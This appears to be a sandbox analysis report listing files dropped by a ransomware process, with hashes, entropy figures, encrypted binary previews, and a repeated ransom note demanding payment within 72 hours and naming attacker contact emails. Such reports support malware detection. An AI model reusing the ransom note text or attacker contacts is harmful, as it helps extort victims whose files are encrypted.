                                                                                                    Preview:.UA!-...[F.:.d.U..|...i......."."....Y8).l..$}@&t.T:...u....s.>3...ze....^....A(..3Z.i...4....*.....;.`=L.6.zz.w..+x.....E'4.;.m..u..wc.....<U...#....Z......_...g.....X..J?<.7..BT..="..Ks..q+.....8.f....... ..gW.J..Db..o....Z......DTj..)....".O...q...O...txu........B!Siu.#D.U.}vW%....I....`B....7..L.;.eI.....V%.P.......f.........T....rZS..18.....6....6F31(.p...N.._.}.Wl[..S.;.X....1.[_.g5..1.i[.....b...[....p..t...~./".:.Y..FWb.}iE.M1I.7qiBR.fn.p.............u*.{.....w`~J4.m..8p.yN8..I.....P.B.g.".3........:...&).b..bo7JG....@...r..s,.^...[@brJ9..5:r4O..aV...!J.Rk....@....Y...B...O.......&...i..K.>F.&.g_._..O.r.pQp-...Fe.7..$..wJP,k0.4.....@.e..f....4Aq).......f...K..n.G_....%g...f.|<zyX....iS.n2R.*.[o1Y.......A.UUE...|..G...KJ....t....~...bT...0y..)..vV...m...m...YbG.....o;...x.......]......8.[......d...sg\...T.=..N3oH..k....c.<.....G.....?.UCeM#.....3[E.o....< ..l5.W...5M...i.\.......V0...sb..S..T.;._..>.....0I...b.k..+.R-c..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112129
                                                                                                    Entropy (8bit):7.7102423332968435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:ZYQ/IUDIVYNhZBIDt9KFHgoYF0gOY0yLEJdUjMcpP:pAfAZsVFF0gOjymdYj
                                                                                                    MD5:9C9620CBF1DDE32613CB171DA57668C7
                                                                                                    SHA1:F7783EB4C785DDA88CE1E38BDC4EA1365A0F771D
                                                                                                    SHA-256:3FEAD87933C90A717CAB116FF2139A7AD64716C1190BF612BC7ECD0E287F2A93
                                                                                                    SHA-512:FC539586DB8390033BA309937FA8460769E8D0F0544C545AB1D16BD7E91509DB71C722924023FD85D03A986477E108E3634BF3873AEFDBAA49928C0613D72B3B
                                                                                                    Malicious:false
                                                                                                    Preview:.UA!-...[F.:.d.U..|...i......."."....Y8).l..$}@&t.T:...u....s.>3...ze....^....A(..3Z.i...4....*.....;.`=L.6.zz.w..+x.....E'4.;.m..u..wc.....<U...#....Z......_...g.....X..J?<.7..BT..="..Ks..q+.....8.f....... ..gW.J..Db..o....Z......DTj..)....".O...q...O...txu........B!Siu.#D.U.}vW%....I....`B....7..L.;.eI.....V%.P.......f.........T....rZS..18.....6....6F31(.p...N.._.}.Wl[..S.;.X....1.[_.g5..1.i[.....b...[....p..t...~./".:.Y..FWb.}iE.M1I.7qiBR.fn.p.............u*.{.....w`~J4.m..8p.yN8..I.....P.B.g.".3........:...&).b..bo7JG....@...r..s,.^...[@brJ9..5:r4O..aV...!J.Rk....@....Y...B...O.......&...i..K.>F.&.g_._..O.r.pQp-...Fe.7..$..wJP,k0.4.....@.e..f....4Aq).......f...K..n.G_....%g...f.|<zyX....iS.n2R.*.[o1Y.......A.UUE...|..G...KJ....t....~...bT...0y..)..vV...m...m...YbG.....o;...x.......]......8.[......d...sg\...T.=..N3oH..k....c.<.....G.....?.UCeM#.....3[E.o....< ..l5.W...5M...i.\.......V0...sb..S..T.;._..>.....0I...b.k..+.R-c..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):420
                                                                                                    Entropy (8bit):7.47790444036284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:uJDlxa8tQL6QM57VkB0vOL0jUX9W7CZcMHn:uJ5btQW39cYUQe
                                                                                                    MD5:C6C9E479EA2DBFF20A82AA8F565EBB9A
                                                                                                    SHA1:3FF7FE8CC80C61EC6926C6AEA3422D70389A9B75
                                                                                                    SHA-256:87B83BD0088144D93387BDF2C3034D9329D7E2499E209B738CBA88ECF355CA31
                                                                                                    SHA-512:02E50B649BC70DA014BAFC05B234A8E7F32494C75C1B07BE0CE7FB536DD070A1FE0A0238B1837FC86A45C1DDC297DD25E251D5386F52485AD0ABF91D88D76353
                                                                                                    Malicious:true
                                                                                                    Preview:....B..x..l.?.....|.nv...N\.l2..G.G'.i..D.#..j?..KF..>.2...cc,hwq....1.C..h.O.#=..l.f....<G..K._....z.-.a..f.]G ...x..'$...$.....]SV....{:n::|n:y:............Jl....5'.`.6h.)......v...@.........mc.1L.z.n.j...Y.0|.?...&.&'.KK.Q...~......j|..'..R4Y..}u.|j..._.....@..#I.....O........d>...*.......SST.(..4.:3.4R.."...l.{...a..e.....N....@...]y.Q3+.#R&.....PwP..f.n...V...U.....r.'.!w..0.j/...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):420
                                                                                                    Entropy (8bit):7.47790444036284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:uJDlxa8tQL6QM57VkB0vOL0jUX9W7CZcMHn:uJ5btQW39cYUQe
                                                                                                    MD5:C6C9E479EA2DBFF20A82AA8F565EBB9A
                                                                                                    SHA1:3FF7FE8CC80C61EC6926C6AEA3422D70389A9B75
                                                                                                    SHA-256:87B83BD0088144D93387BDF2C3034D9329D7E2499E209B738CBA88ECF355CA31
                                                                                                    SHA-512:02E50B649BC70DA014BAFC05B234A8E7F32494C75C1B07BE0CE7FB536DD070A1FE0A0238B1837FC86A45C1DDC297DD25E251D5386F52485AD0ABF91D88D76353
                                                                                                    Malicious:false
                                                                                                    Preview:....B..x..l.?.....|.nv...N\.l2..G.G'.i..D.#..j?..KF..>.2...cc,hwq....1.C..h.O.#=..l.f....<G..K._....z.-.a..f.]G ...x..'$...$.....]SV....{:n::|n:y:............Jl....5'.`.6h.)......v...@.........mc.1L.z.n.j...Y.0|.?...&.&'.KK.Q...~......j|..'..R4Y..}u.|j..._.....@..#I.....O........d>...*.......SST.(..4.:3.4R.."...l.{...a..e.....N....@...]y.Q3+.#R&.....PwP..f.n...V...U.....r.'.!w..0.j/...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4992
                                                                                                    Entropy (8bit):7.878747178513949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zDEAvsyRzsMZDW/nrjFuNsZJjEPl0Hl/KAJ3Wo1o3YroL2rtbQ:HEAvjJjo/nrdyl0/KAJAbLGC
                                                                                                    MD5:307537E16B60E38BC46227D331508CEB
                                                                                                    SHA1:E0766B720B712551E639245FE525DDA6A588BC0E
                                                                                                    SHA-256:EA5DAFCD95BCB9BB46EB464D246E72643FE879DADE69318041DB36183F2CC817
                                                                                                    SHA-512:13A201BA666653658CF85E07E4386585F83A61D908F08556BCBA0D7128F3D5C2B9988C777C914ED3E7D266A67087547B27EEC43BA8E06FD4081E15DCE8CEC0C3
                                                                                                    Malicious:true
                                                                                                    Preview:..$..,PQy\.L7...A.c....c<....1.1.Z.-4.Z&7z....DU.....2$...'..q....$.W...(..H8.{..P^..0U.>L.pd.....o.o.....3_E..5:.E.$,.3X.C.-9.j.zY[4.x[.#..ghy..}O...zv*....J.>.....7...@.....~d|._......i.r..Q9.q....*/..%,...B...T..}.>;....q.Ky''......._.C..<n..D....}.x.q..8....n...K.. ..2[t..)...c...y.....z].....1..S.q}5.Oi..t...K..%Lh..../..."{...e!8v.q~H!...."X..'?.oBS....\.....;..[.*......D.....@...'Q..C\.....W.ShyUn.d?..)...0^.6f...M*s.....".6.3........i.U....E..L.^...{.^.+.d.c.P....^b...ws.DD>.S..2.. .....o..w...Yd....v...W..7.~J..w}C....Z.L^.K^..t...L.I....AUCqjL9.I....g.lR....R..}..F<.9G...Z...H.H...tLN.!.M.a.DW..h..Z^.......Q.i.FwN.#:......T...xf..8....-#XP.0.25....l.].E._~...Q..dU..wt.@....Z ... ...`~1..x..."..B+.....*.&V.Z..............~#K.o.VC...8....{.V.g...RC.;...Oh..X...&.....H..T..I.../.C.N..m.....8..VX..v.6.xF:..J\.7sx..L...ZFT...z.....c.T..`.z....m..x...F.Z]..nD.CT.....'..u...r.qzMnEe..&yk."X.F?..w..m ....'..l.V...A..u.Q...J.;.)....,..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4992
                                                                                                    Entropy (8bit):7.878747178513949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zDEAvsyRzsMZDW/nrjFuNsZJjEPl0Hl/KAJ3Wo1o3YroL2rtbQ:HEAvjJjo/nrdyl0/KAJAbLGC
                                                                                                    MD5:307537E16B60E38BC46227D331508CEB
                                                                                                    SHA1:E0766B720B712551E639245FE525DDA6A588BC0E
                                                                                                    SHA-256:EA5DAFCD95BCB9BB46EB464D246E72643FE879DADE69318041DB36183F2CC817
                                                                                                    SHA-512:13A201BA666653658CF85E07E4386585F83A61D908F08556BCBA0D7128F3D5C2B9988C777C914ED3E7D266A67087547B27EEC43BA8E06FD4081E15DCE8CEC0C3
                                                                                                    Malicious:false
                                                                                                    Preview:..$..,PQy\.L7...A.c....c<....1.1.Z.-4.Z&7z....DU.....2$...'..q....$.W...(..H8.{..P^..0U.>L.pd.....o.o.....3_E..5:.E.$,.3X.C.-9.j.zY[4.x[.#..ghy..}O...zv*....J.>.....7...@.....~d|._......i.r..Q9.q....*/..%,...B...T..}.>;....q.Ky''......._.C..<n..D....}.x.q..8....n...K.. ..2[t..)...c...y.....z].....1..S.q}5.Oi..t...K..%Lh..../..."{...e!8v.q~H!...."X..'?.oBS....\.....;..[.*......D.....@...'Q..C\.....W.ShyUn.d?..)...0^.6f...M*s.....".6.3........i.U....E..L.^...{.^.+.d.c.P....^b...ws.DD>.S..2.. .....o..w...Yd....v...W..7.~J..w}C....Z.L^.K^..t...L.I....AUCqjL9.I....g.lR....R..}..F<.9G...Z...H.H...tLN.!.M.a.DW..h..Z^.......Q.i.FwN.#:......T...xf..8....-#XP.0.25....l.].E._~...Q..dU..wt.@....Z ... ...`~1..x..."..B+.....*.&V.Z..............~#K.o.VC...8....{.V.g...RC.;...Oh..X...&.....H..T..I.../.C.N..m.....8..VX..v.6.xF:..J\.7sx..L...ZFT...z.....c.T..`.z....m..x...F.Z]..nD.CT.....'..u...r.qzMnEe..&yk."X.F?..w..m ....'..l.V...A..u.Q...J.;.)....,..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):797
                                                                                                    Entropy (8bit):7.730646896453472
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:IrgXlRkurwqEMwevUv7EgqZqwDGjxwZd33pOQngFtriLRdhe2lwsb8xsiFHrGZBs:2OlOuENqvUjvwSj2Z95O3EPToxYZqdNV
                                                                                                    MD5:F1B83EE0E8454080ED53AC80BA020942
                                                                                                    SHA1:D2E9C401096F84682EC476BF6B15B9EFDECA233E
                                                                                                    SHA-256:7171592A531D6500924EF6CCB806E162830EE0E623652FC73CE696D957718FFB
                                                                                                    SHA-512:95ECCA4FD9AFDEA26F036CDC458261944F137C78CB3C34A1423C7BEAA64AFF621BFFE8E082744BEBB686491A382B761F508AA5B6445A40EF9A1948C7232EA0C7
                                                                                                    Malicious:true
                                                                                                    Preview:....E....Y......(W3..50.K.t....w.g/.......5p..1..Ea.6....>.="@.MS+.N...M7w...:d. 7(..|...6Y.2..tlC0.M..0.)Ll....a.B..u..~X..g.#z0.....m.Q.vPK{2..N.5......E`.u...h?..`*...QF-pWn..$b..xe....I..}&.:..:~...;.4..K...w......q{..f|.u...E\.C.%T..:.......AO...U.).y......E...r.&.^..ny._=...?..b.....%:,..{@.i|ms..V..nB..<.8... ..?O.O......P1x.w...RUSe@.I..M..<....7.~.r=..dyD..[to..Fo...b.....8.M.TL.`.W.C.u.;.).|U.v)..5..4..c+.#........<....L.......N..>.....u1.O.....}n1{F.i.s....Z{..].Y.|...a..B@..X@....,0.~...O..l;Oy.6..(...y..=L'W.8......U.c..r.`U....h..^j..'+#,.r~nZ...;..R......u.....Yi6..[..t...!...Bp..^..Ad~......0...D...:u...(......It.xF.A........Nf...}..~.....A..ms.C..&SGz.+U.?......O2...{Z.$...B..........|..,......w.$\.av..+.$#..R4.....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):797
                                                                                                    Entropy (8bit):7.730646896453472
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:IrgXlRkurwqEMwevUv7EgqZqwDGjxwZd33pOQngFtriLRdhe2lwsb8xsiFHrGZBs:2OlOuENqvUjvwSj2Z95O3EPToxYZqdNV
                                                                                                    MD5:F1B83EE0E8454080ED53AC80BA020942
                                                                                                    SHA1:D2E9C401096F84682EC476BF6B15B9EFDECA233E
                                                                                                    SHA-256:7171592A531D6500924EF6CCB806E162830EE0E623652FC73CE696D957718FFB
                                                                                                    SHA-512:95ECCA4FD9AFDEA26F036CDC458261944F137C78CB3C34A1423C7BEAA64AFF621BFFE8E082744BEBB686491A382B761F508AA5B6445A40EF9A1948C7232EA0C7
                                                                                                    Malicious:false
                                                                                                    Preview:....E....Y......(W3..50.K.t....w.g/.......5p..1..Ea.6....>.="@.MS+.N...M7w...:d. 7(..|...6Y.2..tlC0.M..0.)Ll....a.B..u..~X..g.#z0.....m.Q.vPK{2..N.5......E`.u...h?..`*...QF-pWn..$b..xe....I..}&.:..:~...;.4..K...w......q{..f|.u...E\.C.%T..:.......AO...U.).y......E...r.&.^..ny._=...?..b.....%:,..{@.i|ms..V..nB..<.8... ..?O.O......P1x.w...RUSe@.I..M..<....7.~.r=..dyD..[to..Fo...b.....8.M.TL.`.W.C.u.;.).|U.v)..5..4..c+.#........<....L.......N..>.....u1.O.....}n1{F.i.s....Z{..].Y.|...a..B@..X@....,0.~...O..l;Oy.6..(...y..=L'W.8......U.c..r.`U....h..^j..'+#,.r~nZ...;..R......u.....Yi6..[..t...!...Bp..^..Ad~......0...D...:u...(......It.xF.A........Nf...}..~.....A..ms.C..&SGz.+U.?......O2...{Z.$...B..........|..,......w.$\.av..+.$#..R4.....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5679
                                                                                                    Entropy (8bit):7.845715093111063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Sou8pVu9Qu1ATLmpLMazVijjSKfFgffafPicQsi+Qk/g6jR/oYjJ:Sou8pJu1AmLzQRfF8fYs8/g6N3F
                                                                                                    MD5:9F21E1FE187C472D1DD4EF93CF7689FF
                                                                                                    SHA1:4D2CBFAA92FE33A016E10FFBF15B812E62A0A97A
                                                                                                    SHA-256:6EAD6C18F7B01784547151A2EA565FD531729C96992F1BBD3F98FECAD4B458E4
                                                                                                    SHA-512:340C2084043A3E16610D1C3F56CCCC2CC396ECEAEB1EDBF3CDF0D116683700680945E8FEA746852C4FABD69B55EF6F15F94157F37A727B2DF723309757ADD131
                                                                                                    Malicious:true
                                                                                                    Preview:b)#;.v..L......D.|.B........S.x.#:........`l^$PoX....Z...........q...+"B..M...x.P..a..=p.?.......O.T.jiq.5.Y............&.zH.+.4?@..1..C.<......z.1.[}......Rhx.e..7.= ^.T....Y.Y..,.U3.*.2.M....:....e+g...$...a[.K..ON..\....&..}.t......Jl..)..0..v..Z|I=.4.9.k.V..M....';...4.U.bY..6i:.t..9...5.s.|.h\.F..........jug(.vX...*...1..dA....O.|...r...Vo..t.%n.u=...#.=R..OK.L..T`.....v.C?U....X..|...T|.F*......%.~.H...4 .Z7JC.H2...A.a..]...h.DdL....D;.....h..o./..*......2.........f...ZD..t.8.xn!.2L...Z...(MPcv.N..r]...=..]......!{O.....".*`]....P...FVTf....ZR;..Z.F4e.V(F...x.>.7.j......5}.....9Q.I].p.l....\.....Gv..V.N.w.1..-.o......`..............x...#Y..+.=Za..N9..r.u..o........-c&.-.)...A^m.Y.J...U..E.nYeq......t....u..8..m.... D5......u.m..........h...G....N..i3.Y....uo.E...8%<U......... /.qo../.*.RF)*....6..3..'z..l.d..U..H.NI(=c.)R&o_c..r.JMPoVL....$^.@......H.d..N..!...)....8...:...c..g..&..|..1wG....pB.....5.....n...Q..x...z..../,...D.5.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5679
                                                                                                    Entropy (8bit):7.845715093111063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Sou8pVu9Qu1ATLmpLMazVijjSKfFgffafPicQsi+Qk/g6jR/oYjJ:Sou8pJu1AmLzQRfF8fYs8/g6N3F
                                                                                                    MD5:9F21E1FE187C472D1DD4EF93CF7689FF
                                                                                                    SHA1:4D2CBFAA92FE33A016E10FFBF15B812E62A0A97A
                                                                                                    SHA-256:6EAD6C18F7B01784547151A2EA565FD531729C96992F1BBD3F98FECAD4B458E4
                                                                                                    SHA-512:340C2084043A3E16610D1C3F56CCCC2CC396ECEAEB1EDBF3CDF0D116683700680945E8FEA746852C4FABD69B55EF6F15F94157F37A727B2DF723309757ADD131
                                                                                                    Malicious:false
